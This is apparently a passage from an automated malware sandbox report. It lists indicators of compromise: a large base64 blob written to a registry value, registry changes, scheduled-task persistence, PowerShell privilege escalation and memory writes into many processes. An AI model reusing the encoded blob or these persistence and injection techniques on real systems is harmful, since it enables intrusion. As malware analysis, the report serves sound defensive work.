y2ZluSNsMisVVySuBtZm4wbzObxk6vGv+pgG+nL6P99NYFP+Gi3L45j4bsxmKBgAB/w7KclA4/Z0wsIbA9Z0tkyA7kFKcvTnQKQ90B+lcwArmGyLCu8G4U6aKdXJFOFIUbE8kgT5SyLI7CeiY+0FP8dUjuRbW/u4ECxJmRTB3So0kIXpO64TeNmrPz13tdZnCdEBz67eq1ClgBtrxPnMuRrEmqabwMbXi2gwRx8tWnebB/ozz40zZ1cqrKM1BC9Iq8HKlDUT2aam9EofTQNa8jfnGshK5RsMRIfWBTz2LhKsJlWtXpdPy9kYF7/lb3Oszkdu2h7VmNG7q6TDMxUcrT1IoquyElGQe1KK2/NEiPmpE16Sm3oWjTathTBi8BGAX5Uf4tybL0ZNwTIl/1jS96qPmaM2SbLm9GAIq0QVfFpDMgneO7+WHvmN0j/D9b/mWbwMdKlxt+zb8HYF2Kj+6hT4B4OpO1j+juQV6WxYdwNpj+v1RqKnYOmX1iqRPIMRu3hh+WRvl1Gb8ffTQF31c/9+HPcZZ2Hi3h/A04DgELqSBFR89EbdoqOOPJd0i41g6F3Qlx8vnvU/roiYi3eOqMry/cx2yFRXaIUY50xrlJtoCZ1qpQAVdE5zU24A32APaJd0dtx3a2UUyxOKa4IXs3RPJOnGriR74EpajSzi7ti+nDnLW3fJYS+dh95zOqf0MCP5jhagck+aeK8TFGbwCBFOp3bmg353X0010+sa380wg30wK6OiQRE4C5Q2fsc7trU3D61nRSrwaTJprR+WqngoSQ6082PCfK8vWNTD/cvo4HaXrRKYpaIX7OzbE8POpmgnj16kTtaiymIvZJk5GdhicwjTIiohdo6Dkc2rBGT8P7ySxHV4c9ZEtuoBuT5JudKs3BQyrXISe6b+GmjjqSww+JZ+w2a6N1IgdrZSCAos/nr+6lyfhJtCGWRa5ZjPOSoMc8+sKyHiCmRMxWEe41rLekz+e4R6e6Sz2q4d/XkYnsU0hw9ftR92yjnoEFpH5aMd4z8vRE3PrJY1JmmFhpDLw8Lm9D5M+PI2HQPrH/8zMbB1cQpM9yqkcf9uAtZo5wvf2kBp1IO6MLW0N2krGEBO6yFFIQQkJR9SdxXhAAAAAgk8C2ejQn3avV0QY1Qqeco8O+Yak3/aH/TkRl4gcdjesnIHKOcFyEmjP9GWZ6Nq4om8dXoWG6vdJDuAjjWDc5g==" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2392887640-1187051047-2909758433-1000\02hchdpugyvbfmyt\DeviceId = "<Data><User username=\"02HCHDPUGYVBFMYT\"/></Data>\r\n" svchost.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 780031000000000002597d631100557365727300640009000400efbe874f7748445996362e000000c70500000000010000000000000000003a000000000048c5c90055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000599b8a67d7e4da01b672d00be0e4da01b672d00be0e4da0114000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{088e3905-0323-4b02-9826-5d99428e115f}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Downloads" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\NodeSlot = "3" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616209" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133724983703208704" svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" Explorer.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2320 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 3168 powershell.exe 3572 Explorer.EXE 3572 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2860 powershell.exe 2860 powershell.exe 4120 powershell.exe 4120 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3812 powershell.exe 3812 powershell.exe 2080 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 2080 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 2468 powershell.exe 2468 powershell.exe 1220 powershell.exe 1220 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3572 Explorer.EXE 3164 OpenWith.exe 3168 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2860 powershell.exe Token: SeDebugPrivilege 4120 powershell.exe Token: SeIncreaseQuotaPrivilege 4120 powershell.exe Token: SeSecurityPrivilege 4120 powershell.exe Token: SeTakeOwnershipPrivilege 4120 powershell.exe Token: SeLoadDriverPrivilege 4120 powershell.exe Token: SeSystemProfilePrivilege 4120 powershell.exe Token: SeSystemtimePrivilege 4120 powershell.exe Token: SeProfSingleProcessPrivilege 4120 powershell.exe Token: SeIncBasePriorityPrivilege 4120 powershell.exe Token: SeCreatePagefilePrivilege 4120 powershell.exe Token: SeBackupPrivilege 4120 powershell.exe Token: SeRestorePrivilege 4120 powershell.exe Token: SeShutdownPrivilege 4120 powershell.exe Token: SeDebugPrivilege 4120 powershell.exe Token: SeSystemEnvironmentPrivilege 4120 powershell.exe Token: SeRemoteShutdownPrivilege 4120 powershell.exe Token: SeUndockPrivilege 4120 powershell.exe Token: SeManageVolumePrivilege 4120 powershell.exe Token: 33 4120 powershell.exe Token: 34 4120 powershell.exe Token: 35 4120 powershell.exe Token: 36 4120 powershell.exe Token: SeIncreaseQuotaPrivilege 4120 powershell.exe Token: SeSecurityPrivilege 4120 powershell.exe Token: SeTakeOwnershipPrivilege 4120 powershell.exe Token: SeLoadDriverPrivilege 4120 powershell.exe Token: SeSystemProfilePrivilege 4120 powershell.exe Token: SeSystemtimePrivilege 4120 powershell.exe Token: SeProfSingleProcessPrivilege 4120 powershell.exe Token: SeIncBasePriorityPrivilege 4120 powershell.exe Token: SeCreatePagefilePrivilege 4120 powershell.exe Token: SeBackupPrivilege 4120 powershell.exe Token: SeRestorePrivilege 4120 powershell.exe Token: SeShutdownPrivilege 4120 powershell.exe Token: SeDebugPrivilege 4120 powershell.exe Token: SeSystemEnvironmentPrivilege 4120 powershell.exe Token: SeRemoteShutdownPrivilege 4120 powershell.exe Token: SeUndockPrivilege 4120 powershell.exe Token: SeManageVolumePrivilege 4120 powershell.exe Token: 33 4120 powershell.exe Token: 34 4120 powershell.exe Token: 35 4120 powershell.exe Token: 36 4120 powershell.exe Token: SeIncreaseQuotaPrivilege 4120 powershell.exe Token: SeSecurityPrivilege 4120 powershell.exe Token: SeTakeOwnershipPrivilege 4120 powershell.exe Token: SeLoadDriverPrivilege 4120 powershell.exe Token: SeSystemProfilePrivilege 4120 powershell.exe Token: SeSystemtimePrivilege 4120 powershell.exe Token: SeProfSingleProcessPrivilege 4120 powershell.exe Token: SeIncBasePriorityPrivilege 4120 powershell.exe Token: SeCreatePagefilePrivilege 4120 powershell.exe Token: SeBackupPrivilege 4120 powershell.exe Token: SeRestorePrivilege 4120 powershell.exe Token: SeShutdownPrivilege 4120 powershell.exe Token: SeDebugPrivilege 4120 powershell.exe Token: SeSystemEnvironmentPrivilege 4120 powershell.exe Token: SeRemoteShutdownPrivilege 4120 powershell.exe Token: SeUndockPrivilege 4120 powershell.exe Token: SeManageVolumePrivilege 4120 powershell.exe Token: 33 4120 powershell.exe Token: 34 4120 powershell.exe Token: 35 4120 powershell.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe 4620 chrome.exe -
Suspicious use of SetWindowsHookEx 57 IoCs
pid Process 3168 powershell.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3572 Explorer.EXE 3572 Explorer.EXE 3572 Explorer.EXE 3572 Explorer.EXE 3572 Explorer.EXE 3572 Explorer.EXE 3572 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2392 wrote to memory of 2512 2392 cmd.exe 83 PID 2392 wrote to memory of 2512 2392 cmd.exe 83 PID 2392 wrote to memory of 2860 2392 cmd.exe 84 PID 2392 wrote to memory of 2860 2392 cmd.exe 84 PID 2860 wrote to memory of 4120 2860 powershell.exe 85 PID 2860 wrote to memory of 4120 2860 powershell.exe 85 PID 2860 wrote to memory of 2540 2860 powershell.exe 88 PID 2860 wrote to memory of 2540 2860 powershell.exe 88 PID 2540 wrote to memory of 1652 2540 WScript.exe 89 PID 2540 wrote to memory of 1652 2540 WScript.exe 89 PID 1652 wrote to memory of 4952 1652 cmd.exe 91 PID 1652 wrote to memory of 4952 1652 cmd.exe 91 PID 1652 wrote to memory of 3168 1652 cmd.exe 92 PID 1652 wrote to memory of 3168 1652 cmd.exe 92 PID 3168 wrote to memory of 3572 3168 powershell.exe 56 PID 3168 wrote to memory of 532 3168 powershell.exe 14 PID 3168 wrote to memory of 1180 3168 powershell.exe 20 PID 3168 wrote to memory of 2556 3168 powershell.exe 43 PID 3168 wrote to memory of 1568 3168 powershell.exe 27 PID 3168 wrote to memory of 1172 3168 powershell.exe 19 PID 3168 wrote to memory of 2548 3168 powershell.exe 42 PID 3168 wrote to memory of 1560 3168 powershell.exe 26 PID 3168 wrote to memory of 1952 3168 powershell.exe 33 PID 3168 wrote to memory of 3132 3168 powershell.exe 54 PID 3168 wrote to memory of 2340 3168 powershell.exe 41 PID 3168 wrote to memory of 2740 3168 powershell.exe 45 PID 3168 wrote to memory of 2332 3168 powershell.exe 40 PID 3168 wrote to memory of 1120 3168 powershell.exe 17 PID 3168 wrote to memory of 1736 3168 powershell.exe 30 PID 3168 wrote to memory of 780 3168 powershell.exe 10 PID 3168 wrote to memory of 940 3168 powershell.exe 12 PID 3168 wrote to memory of 2784 3168 powershell.exe 48 PID 3168 wrote to memory of 1128 3168 powershell.exe 18 PID 3168 wrote to memory of 1908 3168 powershell.exe 32 PID 3168 wrote to memory of 1708 3168 powershell.exe 29 PID 3168 wrote to memory of 2296 3168 powershell.exe 39 PID 3168 wrote to memory of 3672 3168 powershell.exe 57 PID 3168 wrote to memory of 1296 3168 powershell.exe 22 PID 3168 wrote to memory of 1092 3168 powershell.exe 66 PID 3168 wrote to memory of 892 3168 powershell.exe 11 PID 3168 wrote to memory of 1284 3168 powershell.exe 21 PID 3168 wrote to memory of 1676 3168 powershell.exe 28 PID 3168 wrote to memory of 2036 3168 powershell.exe 35 PID 3168 wrote to memory of 2656 3168 powershell.exe 44 PID 3168 wrote to memory of 1640 3168 powershell.exe 36 PID 3168 wrote to memory of 2432 3168 powershell.exe 75 PID 3168 wrote to memory of 4592 3168 powershell.exe 65 PID 3168 wrote to memory of 1044 3168 powershell.exe 16 PID 3168 wrote to memory of 2028 3168 powershell.exe 34 PID 3168 wrote to memory of 4380 3168 powershell.exe 69 PID 3168 wrote to memory of 1036 3168 powershell.exe 15 PID 3168 wrote to memory of 2804 3168 powershell.exe 49 PID 3168 wrote to memory of 1420 3168 powershell.exe 25 PID 3168 wrote to memory of 820 3168 powershell.exe 68 PID 3168 wrote to memory of 1320 3168 powershell.exe 23 PID 3168 wrote to memory of 1400 3168 powershell.exe 24 PID 3168 wrote to memory of 2772 3168 powershell.exe 47 PID 3168 wrote to memory of 1784 3168 powershell.exe 37 PID 3168 wrote to memory of 1768 3168 powershell.exe 31 PID 3168 wrote to memory of 3484 3168 powershell.exe 55 PID 3168 wrote to memory of 2760 3168 powershell.exe 72 PID 780 wrote to memory of 3236 780 svchost.exe 93 PID 780 wrote to memory of 3236 780 svchost.exe 93 PID 780 wrote to memory of 3236 780 svchost.exe 93 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
